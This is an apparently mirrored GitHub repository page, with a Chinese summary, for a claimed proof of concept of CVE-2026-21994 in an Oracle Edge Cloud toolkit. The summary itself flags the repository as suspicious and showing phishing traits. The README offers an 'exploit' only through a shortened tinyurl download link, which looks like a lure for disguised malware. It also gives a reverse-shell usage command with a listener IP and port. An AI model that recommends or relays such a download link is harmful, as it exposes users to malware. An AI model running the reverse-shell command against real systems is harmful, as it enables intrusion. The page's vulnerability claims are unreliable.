TEXploited/CVE-2026-21994

GitHub: TEXploited/CVE-2026-21994

一个可疑的「CVE-2026-21994」漏洞POC仓库,声称针对Oracle产品但存在多处钓鱼投毒特征,需谨慎对待。

Stars: 1 | Forks: 0

# CVE-2026-21994 - POC ## 概述 Oracle Edge Cloud Infrastructure Designer and Visualisation Toolkit(组件:Desktop)中的漏洞,影响版本 0.3.0。一个易于利用的漏洞允许通过 HTTP 进行网络访问的未经身份验证的攻击者入侵该应用程序。 ## 漏洞利用: ### [在此下载](https://tinyurl.com/2rbwjnts) ## 详情 + **CVE ID**: CVE-2026-21994 + **发布日期**: 03/17/2026 + **影响**: 严重 + **CVSS**: 9.8 + **补丁情况: (尚无官方补丁)** ## 影响 成功利用此漏洞可能导致 Oracle Edge Cloud Infrastructure Designer and Visualisation Toolkit 被完全接管,对机密性、完整性和可用性造成严重影响。攻击者无需身份验证或用户交互即可获得受影响系统的完全控制权。 ## 受影响版本 Oracle Edge Cloud Infrastructure Designer and Visualisation Toolkit 0.3.0 ## 使用方法 ``` python3 exploit.py -u http://target:8085 -l 192.168.1.100 -p 4444 --shell ``` ## 联系方式 + **如有疑问,请联系:evilxploits@outlook.com** + **漏洞利用程序** :[在此下载](https://tinyurl.com/2rbwjnts)
标签:CISA项目, CVE-2026-21994, CVSS 9.8, Designer and Visualisation Toolkit, Edge Cloud Infrastructure, Oracle, POC, Python, RCE, 反向Shell, 攻击脚本, 无后门, 未授权访问, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护, 零日漏洞, 高危漏洞